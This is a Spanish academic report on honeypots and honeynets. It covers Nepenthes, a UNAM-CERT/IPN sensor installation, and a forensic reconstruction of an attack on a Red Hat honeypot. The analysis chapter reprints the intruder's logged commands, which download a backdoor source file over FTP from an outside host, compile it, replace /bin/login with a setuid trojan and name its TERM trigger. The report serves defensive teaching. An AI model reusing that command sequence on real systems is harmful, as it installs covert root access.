Detección Este segundo Nivel de seguridad es la acción de detectar y alertar accesos no autorizados. En el mundo físico sería algo similar a instalar cámaras de seguridad, alarmas contra intrusos o detectores de movimiento, estas alarmas se neutralizan cuando alguien logra infiltrarse, en el mundo digital de la seguridad informática se tiene el mismo reto cabe mencionar que esta solución no mantiene alejado al intruso pero si puede alertar sobre accesos no autorizados.
Mientras que los honeypots agregan muy poco valor en la fase de Prevención en la fase de Detección agrega un extenso valor ya que para muchas organizaciones esta fase es compleja y extremadamente difícil de manejar. Existen tres retos comunes en la fase de detección, que las organizaciones enfrentan y estos son los falsos positivos, falsos negativos y la agregación de datos. El primero son los Falsos positivos existen cuando de manera falsa el sistema alerta de actividad sospechosa o maliciosa, por ejemplo un sistema procesa un resultado de actividad peligrosa cuando en realidad es una actividad legitima de producción. El segundo los falsos negativos son exactamente lo contrario un ejemplo es cuando un sistema falla en detectar un ataque, el Tercer reto es la agregación de datos, cuando la organización trata de centralizar y recolectar todos los datos que son usados en la detección para posteriormente ser analizados y al mismo tiempo identificar los datos importantes.
Cuando ocasionalmente hablamos de un falso positivo o negativo no hay mucho problema pero ¿que pasa?, cuando tenemos una situación en la cual existen millones de este tipo de eventos al día, el administrador tendría que atender tantos boletos de requerimientos que no podría atenderlos. Este tipo de casos harían que esta fase no sea tomada en cuenta y en poco tiempo sea ignorada cuando en realidad esta fase es muy importante.
Los detectores de Intrusos de red (NIDS) son un ejemplo claro a esta problemática ya que están diseñados para realizar un monitoreo de la red y detectar actividad maliciosa usando una base de datos que contiene las firmas de los ataques conocidos cuando una actividad en la red hace una coherencia con algunas de las firmas en la base datos el sistema dispara una alerta indicando al administrador de un ataque.
Sin embargo el traficó legitimo puede ser confundido fácilmente con una de la firmas de la base datos y al mismo tiempo que realizando una alerta. Por ejemplo un usuario se suscribe a The Common Vulnerability Scoring System (CVSS) y este recibe de manera concurrente alertas de vulnerabilidades, los datos que puede contener el correo son el código de traficó malicioso como el malware o una salida de un exploit estos datos pueden ser confundidos por NIDS.
Honey Forensic
En cuanto a los falsos negativos por ejemplo cuando tenemos una situación en la cual hablamos de mucho traficó por segundo cabe la posibilidad de que uno de esos paquetes tenga código malicioso o incluso que el atacante allá manipulado el paquete para no ser detectado mientras realiza la intrusión, un ejemplo claro es ADMmutate IDS Evasion Tool esta herramienta creada por k2 permite tomar un exploit conocido y modificar su firma y ya que las firmas son las que indican si es o no una actividad maliciosa el paquete manipulado con esta herramienta no podrá ser identificado por el NIDS, un ejemplo mas seria cuando una comunidad Black Hat desarrolla un exploit y es clasificado como un ataque 0day, este mismo es utilizado para realizar un ataque dentro de la red de la organización esta firma por consiguiente no existe en la base de datos, esto hará que el sistema no pueda ser capaz de alertar al administrador del ataque por lo tanto es indispensable que la base de datos del NIDS esté en constante actualización.
Respuesta al Incidente En el momento en que se genera una alerta de un acceso no autorizado se necesita la habilidad de responder ante este incidente un honeypot agrega un valor muy importante ante este aspecto de seguridad, el reto al que se enfrentan las organizaciones es la recolección e identificación de evidencia se requiere saber ¿que fue lo que paso? Esta información es crítica no solo para que las organizaciones puedan perseguir al intruso y tomar acciones legales si no también obtener el conocimiento necesario para defenderse del ataque.
Cuando el atacante se infiltra en el sistema dejando huellas de sus acciones esto se puede observar mediante el principio de locard del cual se hablo en capitulo 2. Con esta evidencia podemos determinar como se realizo la intrusión, que fue lo que realizo el intruso estando dentro del sistema y si existen mas personas implicadas en el ataque.
Sin este tipo de información las organizaciones no pueden reaccionar de manera eficaz en este aspecto. Aun cuando los intrusos modifiquen las bitácoras del sistema o los datos que sirven de evidencia existen técnicas forenses que nos permiten determinar paso a paso que fue lo que realizo el atacante, por medio de los atributos de Tiempos MAC (modificación, acceso, cambio) de los ficheros realizando un análisis de línea de tiempo, sin embargo esta información puede ser contaminada o dañada dejándola inservible para su análisis. Aun con las técnicas innovadoras que hoy día existen para la recuperación de información si esta dañada es difícil de recuperar al 100 por ciento la información.
Los honeypots agregan un valor en la fase de respuesta a incidentes ya que por no contener ninguna actividad de producción se resuelve el problema de contaminación de información y cuando un honeypot es comprometido es fácil apagar el sistema sin ningún impacto a la línea de negocios de la Organización.
Honey Forensic
Que es una HoneyNet? Una Honey net es un honey pot de alta interacción, que provee al atacante de un sistema real para que este interactué con el. Esta alta interacción permite obtener información de varios tipos como los motivos que tienen para atacar el sistema o como realizan el ataque. Las honeynets implementan esto creando una red de sistemas funcionales similares a los que las organizaciones utilizan como sistemas de producción, esta red esta sumamente controlada por el riesgo que representa tener honeypots de alta interacción, cuando estos sistemas son atacados las honeynets capturan toda las actividades del atacante y controlan el traficó entrante y saliente de esta zona red a la cual generalmente se le denomina Zona HoneyPot , esta información es de gran ayuda ya que permite obtener el conocimiento de cuales son las nuevas amenazas que las organizaciones enfrentan en la actualidad.
HoneyNet Virtual
Las HoneyNets Virtuales son una solución que permiten ejecutar todo lo que se requiere para la implementación de una honeynet en una sola computadora, se usa el término virtual por que cada uno de los sistemas que se ejecutan tienen la apariencia de ejecutarse por si mismos es decir de manera autónoma.
Una de las razones por las cuales se implementa esta solución es debido a que existe la tecnología de virtualización que nos permite ejecutar múltiples sistemas operativos al mismo tiempo y en un solo hardware. Las honeynets virtuales no son una tecnología nueva es simplemente utilizar el concepto de Honeynet implementándola en un solo hardware, Esta implementación tiene sus ventajas y desventajas únicas a diferencia de las honeynets tradicionales.
Las categorías de esta solución son las siguientes:
• Honeynet Virtual Contenida en si misma (Self-Contained Virtual Honeynet)
• Honeynet Virtual Hibrida
Honeynet Virtual Contenida en si misma (Self-Contained Virtual Honeynet)
Esta categoría nos indica que una honeynet virtual contiene toda una red completa concentrada en una sola computadora, toda la red virtual esta contenida en un solo sistema físico, una honeynet típica generalmente esta integrada de un firewall y un Gateway para el control de datos y captura de datos.
Honey Forensic
Algunas ventajas de este tipo de Honeynet virtual son las siguientes:
• Portabilidad: este tipo de Honeynets se pueden implementar en una laptop y llevar a cualquier sitio.
• Implementación Plug and Catch: Se puede conectar directamente a la red y esperar a que este sea atacado.
• Reducción en costo y espacio: El costo es muy reducido solo se necesita una sola computadora además que el espacio físico que ocupa es pequeño.
Algunas de sus desventajas:
• Punto de fallo: Si el hardware falla por ende toda la Honeypot será inutilizable.
• Características de Hardware: Para que una computadora soporte la implementación de una Honeynet se requiere una gran capacidad de Hardware en cuanto almacenamiento, procesamiento y memoria.
• Seguridad: Ya que se esta compartiendo el mismo Hardware para todos los sistemas existe la posibilidad de que el atacante se infiltre en otras partes del sistema esto depende mucho del Software que se utiliza para la virtualización.
Honey Forensic
Figura 1.1 Implementación de una HoneyNet Virtual (Self-Contained Virtual Honeynet) [A]. .
Honeynet Virtual Hibrida
Es la combinación de la tecnología de virtualización y una Honeynet clásica, el control de datos como los Firewalls y la captura de datos como los IDS están aislados de la red esta características reduce el riesgo de un compromiso aunque todos los Honeypots corren dentro de una misma computadora.
Algunas ventajas son las siguientes:
• Seguridad: Como se vio en la categoría ( Self-Contained Virtual Honeynets) el atacante podría infiltrarse al sistema Host es decir infiltrarse a sistema que esta realizando la virtualización, mas sin en cambio con un Honeynet Virtual Hibrido es diferente el único peligro es que el atacante obtenga un acceso no autorizado a otros Honeypots.
• Flexibilidad: En esta Honeynet Virtual se puede usar tanto software libre como
software propietario así como dispositivos como un cisco pix por ejemplo.
Honey Forensic
Algunas desventajas son las siguientes:
• Ninguna portabilidad: Es decir no podemos mover de un lugar físico a otro la solución. • Costo elevado: Para su implementación se necesitan mas recursos de espacio y
posiblemente dinero ya que existen mas de un dispositivo físico como computadoras, routers, switches etc.
Figura 1.2 Implementación de una HoneyNet Virtual Hibrido [A].
Honey Forensic
Introducción a Nephentes Nepenthes es una solución versátil de Honeypot de baja interacción diseñada para recolectar malware [9].
Actúa de forma pasiva emulando vulnerabilidades conocidas que los gusanos, malware, troyanos y virus usan para esparcirse por la red, esto permite la captura de estos mismos.
La primera razón por la cual se utiliza Nepenthes es por que es software libre, los virus que se puedan capturar son gratuitos. Podemos recoger este tipo de datos sin pagar por el uso el resto de los razones son de seguridad.
Configurar un equipo que ejecute Nepenthes puede mejorar la seguridad de la red de manera drástica, se puede observar por ejemplo quien esta realizando un escaneo de vulnerabilidades.
Existen diferentes caminos que un gusano informático puede tomar para distribuirse dentro de la red por lo tanto Nepenthes es modular.
Algunos de los módulos son los siguientes.
* resolve Dns asynchronous
* emulate vulnerabilities
* download files
* submit the downloaded files
* trigger events
* shellcode handler
El desarrollo de los Módulos de vulnerabilidades de Nepenthes requiere conocimientos sobre las debilidades de los sistemas ya que también un virus hace lo mismo por ejemplo: un evento de comunicación en el cual un virus explota una vulnerabilidad y obtiene la información necesaria para descargar un archivo y enviarlo al atacante, se puede obtener información suficiente mientras que el atacante no se de cuenta de que es engañado.
Por otra parte Nepenthes es muy útil para captar nuevos exploits para vulnerabilidades ya conocidas. Ya que Nepenthes no conoce estos exploits, estos mismos aparecerán en las bitácoras.
Mediante la ejecución de estas capturas contra una verdadera máquina vulnerable se puede adquirir nueva información sobre los exploits y con ello escribir un nuevo modulo para Nepenthes.
Honey Forensic
Capítulo 4: Convénio Unam CERT HoneyNet Project / IPN Esime Culhuacan (PSTM)
Capitulo 4: Convénio Unam CERT HoneyNet Project / IPN Esime
Honey Forensic
Culhuacan (PSTM)
Proyecto HoneyNet Unam México El proyecto Honeynet de la Universidad Nacional Autónoma de México (UNAM) está conformado por un grupo de personas dedicadas a la seguridad informática con fines académicos y sin fines de lucro, realizando investigaciones sobre seguridad en redes y tecnologías de Honeypot, al cual tiene por nombre “equipo de respuesta a incidentes de seguridad en cómputo” del Departamento de Seguridad en Cómputo UNAM-CERT liderado hoy día por el Ing. Rubén Aquino Luna [8].
El Plan de Sensores de tráfico malicioso y malware El Proyecto Honeynet UNAM en el cual se integra el Instituto Politécnico Nacional unidad Esime Culhuacan en Noviembre 2009 , por medio de un convenio entre estas dos Instituciones Académicas, se establece como líder Técnico al alumno de la Especialidad en Seguridad Informática y tecnologías de la información del IPN Ing. Jonathan Ángeles García Asesor M en C Marcos Arturo Rosales García y como Representante de Entidad del Instituto Politécnico Nacional (Escuela Superior de Ingeniería Mecánica y Eléctrica) ESIME Unidad Culhuacan el Dr. Gabriel Sánchez Pérez y el Dr. Moisés Salinas Rosales. El UNAM-CERT cuenta con varios proyectos uno de los cuales es el Plan de Sensores de Tráfico Malicioso (PSTM) que es una iniciativa de UNAM-CERT por medio del proyecto Honeynet UNAM, cuyo objetivo es crear una red de sensores para la identificación de actividad maliciosa en las redes de datos en México, en donde las entidades participantes podrán intercambiar información sobre amenazas observadas en diferentes partes de estas redes y con ello fortalecer los esfuerzos de respuesta a incidentes y de investigación en seguridad.
Objetivos del Convenio
Honey Forensic
• Ser un mecanismo de seguridad pro-activa que permita identificar nuevas tendencias en ataques y técnicas Forenses así mismo compartir esta información con la comunidad.
• Difundir las lecciones y técnicas aprendidas con la comunidad así como las ventajas de contar o participar en un esfuerzo como lo es el Proyecto Honeynet.
• Identificar, analizar y aprender de los ataques, herramientas y descubrimientos presentes en los sensores implantados por el Proyecto Honeynet UNAM.
• Brindar capacitación a organizaciones interesadas en mejorar sus niveles de seguridad en contra de las amenazas existentes.
• Compartir mediante programas de capacitación dirigidos especialmente a la comunidad estudiantil de México, las lecciones aprendidas y las recomendaciones para evitar incidentes similares a los encontrados en nuestros sensores.
• Servir como un mecanismo adicional en la atención de incidentes gestionados por el UNAM-CERT.
• Participar en la investigación sobre nuevas tecnologías Honeypot, que puedan ayudar a la comunidad relacionada al cómputo a mejorar sus niveles de seguridad en su infraestructura.
Para la instalación del Sensor de tráfico malicioso se uso la solución debpentrap otorgada por el CERT/UNAM a través del portal del proyecto HoneyNet UNAM [7].
Honey Forensic
Capítulo 5: Instalación de Sensores IPN Esime Culhuacan
Capitulo 5: Instalación de Sensores IPN Esime Culhuacan.
Requerimientos de Hardware Los siguientes requerimientos se usaron para la implementación del Sensor de tráfico Malicioso y no son restrictivos para otro tipo de implementaciones.
Honey Forensic
Procesador de Intel Pentium III arquitectura i686
512 MB de Memoria Ram
40 GB de Disco Duro
4 Tarjetas de Red Ibm 10/100/1000 Base -tx Pci-x 03n6524
Sistema Operativo Gnu/Linux Debian
Kernel 2.66
Memoria Swap 1 GB
Requerimientos de Software. Sistema Operativo gnu/Linux Debían
Librerías del Sistema Operativo requeridas:
• g++ no usar g++ 4.0.* (no trabaja apropiadamente) (g++ 4.0.2 )
• libcurl
• libmagic
• libpcre
• libadns
• flex y bison (ó lex and yacc).
• Nota: estas herramientas probablemente ya este instaladas en el sistema en la mayoría de los sistemas Operativos *NIX
• libcap librería para usar las capacidades del Linux kernel
• module-honeytrap
• libpcap packet capture library
• iptables iptables (solo Linux)
Honey Forensic
• + CONFIG_IP_NF_QUEUE=y/m in your kernel
• ipfw and divert sockets ( FreeBSD)
• + “options IPDIVERT # divert.ko modulie”
• + “options IPFIREWALL # ipfw”
Instalación de Depentrap Al descargar la imagen depentrap.iso se tiene que quemar en CD para poder iniciar la maquina y la instalación del sensor con el disco.
Figura 1.1 Boot CD
Honey Forensic
Selección del teclado
Figura 1.2 Selección del teclado
Honey Forensic
Configuración de red
Figura 1.3 Configuración de dirección de red
Honey Forensic
Figura 1.4 Configuración de Gateway parámetro de red
Honey Forensic
Figura 1.5 Configuración de Servidores de DNS
Honey Forensic
Elección de los repositorios
Figura 1.6 Configuración de Gestor de paquetes.
Honey Forensic
Figura 1.7 Configuración de repositorios
Honey Forensic
Ingreso al sistema por primera vez En el directorio home del usuario root, hay un fichero con el nombre de config.sh, este script nos permite configurar los parámetros adicionales del sensor como contraseñas y direcciones IP.
Adicionalmente, esta nueva versión de la herramienta instalará un módulo IDS; esta instalación lleva alrededor de 5 minutos (dependiendo del equipo).
Ejecutamos el script config.sh de la siguiente manera
#./config.sh
Y posterior a la instalación del módulo IDS (ver imagen 1.8), entraremos a la pantalla de
Configuración de la herramienta.
Figura 1.8 config.sh script de configuración del sensor
Honey Forensic
Contraseñas El primer dato que nos solicitará la interfaz del script config.sh será la contraseña del usuario root. Esta contraseña la asignará el propietario del sensor y la podrá utilizar para realizar cualquier tarea administrativa que desee (Imagen 1.9). La interfaz solicitará la confirmación de la contraseña, por lo que se tendrá que escribirla de nuevo.
Figura 1.9 Contraseña de root
Honey Forensic
Figura 2.0 Confirmación de Contraseña de root
Nombre del equipo.
Figura 2.0 Nombre del equipo
Honey Forensic
Capítulo 6: Análisis de un Ataque.
Honey Forensic
Capitulo 6: Análisis de un Ataque
Análisis Forense de un Honeypot
Elementos del Escenario:
• Servidor Red Hat 6.0 instalación por default ip 172.16.1.107
• Snort IDS firmas obtenidas por Max Visión www.whitehats.com
• ArachNIDs Base de Datos
• Swatch Monitoreo de archivos
• Seridor DNS named V 4.0
La identificación y análisis del ataque comienza el día 26 Abril cuando Snort alerta de un ataque 'Noop' a la Ip del Servidor Red Hat las bitacoras del sistema se guardan en la siguiente ruta /var/log/messages este archivo a su vez es monitoreado por”Swatch.”
Apr 26 06:43:05 lisa snort [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
En menos de 2 minutos el sistema es comprometido y se inicia un acceso no autorizado al sistema.
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)
¿Como se realizo el ataque? ¿En donde comienza el Atacante?. Ahora es necesario poner las piezas en orden paso a paso, el proceso de Enumeración de datos y la Determinación de Vulnerabilidades son fases iniciales antes de iniciar un Ataque. Muchos de los exploits que usan los atacantes necesitan de algún tipo de información antes de ser ejecutados por lo tanto estas fases son necesarias antes iniciar el ataque.
Honey Forensic
Examinando la Información de IDS Snort.
Apr 25 02:08:07 lisa snort [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 lisa snort [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
El sistema es comprometido el día 26 de Abril y podemos observar que un día antes fue probado en el puerto 53 hasta ahora se asume que se realizo con una herramienta automatizada la cual detecta vulnerabilidades conocidas sobre el servicio DNS. Ahora que tenemos las piezas del primer bloque de Análisis, la hipótesis nos indica que hubo un escaneo de red por medio de una Herramienta Automatizada.
Como algunos de los IDS Comerciales, Snort tiene la característica de mostrar los datos de paquetes IP en formato binario tcpdump usando esta característica podemos conducir el análisis examinando los bitácoras de Snort, desde el momento en que se Inicio el Ataque. El análisis no se limita a la Ip 63.236.81.13 ya que el Atacante usa al menos 3 direcciones IP distintas.
Exploit El objetivo del Exploit es obtener una shell de root usuario administrador del sistema en el sistema remoto. Para este exploit particularmente el servidor DNS deberá de ser recursivo Según lo aprendido por medio del análisis del honeypot. Las bitácoras nos indican que el atacante determina si es o no recursivo el servidor DNS enviando una petición para resolver 107.71.80.216.in-addr.arpa.
Honey Forensic
Figura 2.1 Petición de recursividad
No sólo el Servidor tiene una versión de Named Vulnerable si no que también es recursivo. El Servidor DNS realiza peticiones recursivas para NS savings.net para posteriormente hacer una petición a la dirección IP (del registro A) de r.rsavings.net.
Figura 2.2 Query de recursividad al NS rsavings.net.
Honey Forensic
Se ejecuta el exploit haciendo uso de un ataque de buffer overflow obteniendo así un shell de root. Posteriormente se ejecutan una serie de comandos mientras se crean dos usuarios en el sistema con los nombres de twin y hantu.
Figura 2.3 Comandos ejecutados.
Honey Forensic
Figura 2.3 Creación de Usuarios.
Afortunadamente el atacante usa el servicio Telnet para conectarse al Sistema con el usuario Twin y posteriormente cambiar su identidad de usuario a Hantu para posteriormente lograr el acceso como un usuario administrador del sistema, ya que el sistema por defecto no permite acceso con UID (Identificador de usuario) ”0”.
Figura 2.3 Conexión por Telnet al sistema.
Honey Forensic
Sesión de la conexión por Telnet que realizo el atacante.
root@apollo /]# ftp 24.112.167.35
Connected to 24.112.167.35.
220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.
Name (24.112.167.35:twin): welek
331 Password required for welek.
Password:password
230 User welek logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get bj.c
local: bj.c remote: bj.c
200 PORT command successful.
150 Opening BINARY mode data connection for bj.c (1010 bytes).
226 Transfer complete.
1010 bytes received in 0.115 secs (8.6 Kbytes/sec)
ftp> quit
221-You have transferred 1010 bytes in 1 files.
221-Total traffic for this session was 1421 bytes in 1 transfers.
221-Thank you for using the FTP service on linux.
221 Goodbye.
Honey Forensic
Compilación del Backdoor
Para poder compilar es necesario un programa informático que traduzca un programa escrito en un lenguaje de programación a otro lenguaje de programación, generando un programa equivalente que la máquina será capaz de interpretar. El atacante utiliza gcc para poder compilar el código fuente y posteriormente usar el backdoor en el sistema.
[root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/login rm bj.cgcc -o login bj.c
bj.c: In function `owned':
bj.c:16: warning: assignment makes pointer from integer without a cast
Ahora el Backdoor es implementado copiando el binario /bin/login /usr/bin/xstat, mientras que el troyano compilado es usado para remplazar el binario /bin/login. Este troyano permite los accesos por medio de la configuración TERM vt9111.
Comandos ejecutados [root@apollo /]# chown root:bin login
root@apollo /]# chmod 4555 login
root@apollo /]# chmod u-w login
root@apollo /]# cp /bin/login /usr/bin/xstat
cp: /bin/login: No such file or directory
root@apollo /]# cp /bin/login /usr/bin/old
cp: /bin/login: No such file or directory
root@apollo /]# rm /bin/login
rm: cannot remove `/bin/login': No such file or directory
root@apollo /]# chmod 555 /usr/bin/xstat
root@apollo /]# chgrp bin /usr/bin/xstat
root@apollo /]# mv login /bin/login
Honey Forensic
Técnica antiforense Una de las fases que los hackers usan en cada uno sus delitos es encubrir y modificar cada una de las posibles evidencias dejadas en la escena del crimen, por que estas pueden ser usadas localizar su paradero por ello los intrusos encuben los rastros del acceso no autorizado, el atacante ejecuta un script con el fin de no dejar rastro de la intrusión. Se asume que el atacante copio el contenido del script y lo pego en la consola del sistema para posteriormente ejecutarlo ya que esta ejecución se realizo una sola vez en el prompt del sistema, al parecer este script es genérico porque intenta borrar directorios que no existen en el sistema (como /tmp/h).
Figura 2.4 Ejecución del script.
En este momento se pone fuera de la red el servidor con el objetivo de realizar un análisis de la Integridad de los archivos con (TripWire). Por curiosidad se conecta de nuevo en la red y dos semanas después el servidor es de nuevo comprometido.
Honey Forensic
The DDoS Project's "trinoo"
Herramienta de Ataque de Denegación de Servicio.
Figura 2.4 Conexión al sistema y resolución de Nombres.
El atacante se conecta vía Ftp a un Sitio en Singapore para descargar una nueva Herramienta.
Figura 2.5 Acceso a otros sistemas y el Uso del Backdoor.
Honey Forensic
Figura 2.6 Descarga de la Herramienta Trinoo y Obtención de Acceso al Sistema.
Figura 2.7 Conexión a diferentes Sistema.
Honey Forensic
Figura 2.8 Ataque Denegación de Servicio.
El intruso hace uso de la Herramienta sobre otros Sistemas Remotos en este momento el servidor es apagado para no ser usado como arma y comprometer otros sistemas.
Honey Forensic
Figura 2.9 Diagrama de un Ataque de Denegación de Servicio.
Honey Forensic
Conclusión Los Honeypots surgen como un concepto, tecnología y medio que permite resolver varios retos que enfrenta la seguridad informática, esta característica permite que un honeypot pueda intervenir en las categorías de detección, prevención y la respuesta a los incidentes esto sirve para enrobustecer la arquitectura de seguridad de las organizaciones, mientras otorga información vital para un análisis forense, el valor de los datos que se puede obtener de un honeypot es importante cuando se trata de ataques nuevos, esta herramienta también es un elemento de investigación no solo sobre amenazas nuevas si no para varias mas.
Es difícil obtener el conocimiento adecuado cuando nos enfrentamos a delitos informáticos desconocidos en donde una computadora es el elemento para perpetrar el delito. El cómputo forense se puede apoyar en un honeypot con fines de investigación permitiendo la innovación de nuevas tendencias, técnicas, herramientas y metodologías forenses.
Al cubrir el análisis pasó a paso de un ataqué realizado hacia un honeypot y observar como es comprometido, se pudo identificar no solo las técnicas si no los procedimientos que realiza un atacante. El objetivo fue determinar cómo el sistema fue Atacado utilizando un análisis forense del sistema con los registros de IDS, y mediante este análisis obtener una mejor comprensión de qué esperar y buscar en un Análisis Forense.
Honey Forensic
Citas y referencias Bibliográficas
• Honey pots: Tracking Hackers…………………………………………………………..1
Autor: Lance Spitzner
Editorial: Addison-Wesley
• Articulo Papers “ Know Your Enemy: “…………………………………………………2
A Forensic Analysis “the Study of an Attack” 23 May 2000
Honey net Project
• Middleton, Bruce. Cyber crime investigator’s field guide / Bruce Middleton………3
Computer crime Investigation Handbooks, manuals, etc. I. Titile.
• EC-COUNCIL Official Curricula………………………………………………….….....4
Volume I Computer Hacking and Forensic Investigator
Module 1 page 4-9 http://www.eccouncil.org
• The Enhanced Digital Investigation Process Model ……………………………......5
Venansius Baryamureeba and Florence Tushabe Institute of Computer Science, Makerere University
• Curso de Criminalística e Investigación ……………………………………………...6
http://www.mailxmail.com
• Proyecto Honey Net UNAM-CERT …………...…………………………………….....7
http://www.honeynet.unam.mx
• CERT UNAM …………………………………………………………………………….8
http://www.cert.org.mx/index.html
• Proyecto Nephentes …………………………………………………………………… 9
http://nepenthes.carnivore.it/
• CUM Mexico …………………………………………………………………………….10
Honey Forensic
https://www.underground.org.mx...................……………………………….……….11
• Internet crime complaint center …………………………………………….………...12
www.ic3.gov
• http://www.honeynet.org/chapters/hongkong …….....………………..……………..A
Honey Forensic
Glosario A
Ataque 0day:
Es un ataque contra una computadora o computadoras basado en encontrar vulnerabilidades aún desconocidas en las aplicaciones informáticas. Los exploits de día 0 se liberan antes de que el vendedor del parche lo libere públicamente. Un exploits de día-cero normalmente es desconocido para la gente y el vendedor del producto.
B
Black hat:
Es un tipo de hacker que busca comprometer un sistema o sistemas con fines maliciosos y de lucro. Por lo general se crean comunidades un underground donde intercambian información sobre tecnología, vulnerabilidades y nuevas técnicas de intrusión.
Botnet
Es un término que hace referencia a un conjunto de robots informáticos, que se ejecutan de manera autónoma y automática. El artífice de la botnet puede controlar todos los ordenadores/servidores infectados de forma remota y normalmente lo hace a través de canales de IRC: Las nuevas versiones de estas botnets se están enfocando hacia entornos de control mediante HTTP, con lo que el control de estas máquinas será muchos más simple. sus fines normalmente son poco éticos.
C
Crackers:
Analogía de "safecracker", que en español se traduce como "un ladrón de cajas fuertes". Es una persona que mediante ingeniería inversa realiza: seriales, keygens y cracks, los cuales sirven para modificar el comportamiento o ampliar la funcionalidad del software o hardware original al que se aplican, sin que en absoluto pretenda ser dañino para el usuario del mismo.
Certificado digital:
Un certificado digital es un documento digital mediante el cual un tercero confiable (una autoridad de certificación) garantiza la vinculación entre la identidad de un sujeto o entidad y su clave pública.
Honey Forensic
Criptografía:
Es el arte o ciencia de cifrar y descifrar información mediante técnicas especiales y se emplea frecuentemente para permitir un intercambio de mensajes que sólo puedan ser leídos por personas a las que van dirigidos y que poseen los medios para descifrarlos.
D
Denegación de Servicio:
En seguridad informática, un ataque de denegación de servicio, también llamado ataque DoS (de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima.
Dns:
Domain Name System (o DNS, en español: sistema de nombre de dominio) es un sistema de nomenclatura jerárquica para computadoras, servicios o cualquier recurso conectado al internet o a una red privada. Su función más importante, es traducir (resolver) nombres inteligibles para los humanos en identificadores binarios asociados con los equipos conectados a la red, esto con el propósito de poder localizar y direccionar estos equipos mundialmente.
DNS cache poisoning / DNS Poisoning / Pharming:
Es una situación creada de manera maliciosa o no deseada que provee datos de un Servidor de Nombres de Dominio (DNS) que no se origina de fuentes autoritativas DNS. Esto puede pasar debido a diseño inapropiado de software, falta de configuración de nombres de servidores y escenarios maliciosamente diseñados que explotan la arquitectura tradicionalmente abierta de un sistema DNS.
E
Exploit:
Exploit (de las siglas en ingles to exploit, explotar o aprovechar) es un software, un fragmento de datos, o una secuencia de comandos con el fin de automatizar el aprovechamiento de un error, fallo o vulnerabilidad, a fin de causar un comportamiento no deseado o imprevisto en los programas informáticos, hardware, o componente .Con frecuencia, esto incluye cosas tales como la toma de control de un sistema de cómputo o permitir la escalada de privilegios o un ataque de denegación de servicio.
Honey Forensic
F
Firewall:
Software utilizado en redes de computadoras para controlar el tráfico de res, permitiéndolas o prohibiéndolas entre diferentes redes.
G
Grey hats:
Gente apasionada por la seguridad informática que depuran y arreglan errores en los sistemas y que también se encuentran envueltos en las comunidades Black Hat.
H
Hacker:
Es una persona apasionada por la seguridad informática. Esto concierne principalmente a entradas remotas no autorizadas por medio de redes de comunicación como Internet. El RFC 13924 habla sobre su definición.
I
IDS:
Sistema de detección de intrusos (o IDS de sus siglas en ingles Intrusion Detection System) es un programa usado para detectar accesos no autorizados a un computador o a una red.
N
Noop:
En informática NOP o NOOP por sus siglas en ingles (No Operation or No Operation Performed) son instrucciones generalmente en lenguajes de bajo nivel o comandos de sistema que no hacen nada
P
Proxy:
El término proxy hace referencia a un programa o dispositivo que realiza una acción en representación de otro. Su finalidad más habitual es la de servidor proxy, que sirve para permitir el acceso a Internet a todos los equipos de una organización.
Phishing:
Honey Forensic
Es un término informático que denomina un tipo de delito dentro del ámbito de fraudes en Internet y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria).
S
Script Kiddies: gente que invade computadoras, usando programas escritos por otros, y que tiene muy poco conocimiento sobre como funcionan.
Spam:
spam, correo basura o sms basura:
Mensajes no solicitados, no deseados o de remitente desconocido, habitualmente de tipo publicitario, enviados en grandes cantidades (incluso masivas) que perjudican de alguna o varias maneras al receptor. La acción de enviar dichos mensajes se denomina spamming.
Ssh:
SSH (Secure SHell, en español: intérprete de órdenes segura) es el nombre de un protocolo y del programa que lo implementa, y sirve para acceder a máquinas remotas a través de una red.
Shell:
Interfaz usada para interactuar con el núcleo de un sistema operativo.
T
TripWire:
Software para verificar la integridad de los datos.
V
Vpn:
Red privada virtual (por las siglas en ingles Virtual Private Network), una tecnología de red que permite extender la red local sobre una red pública relativamente hablando en la cual la comunicación esta cifrada.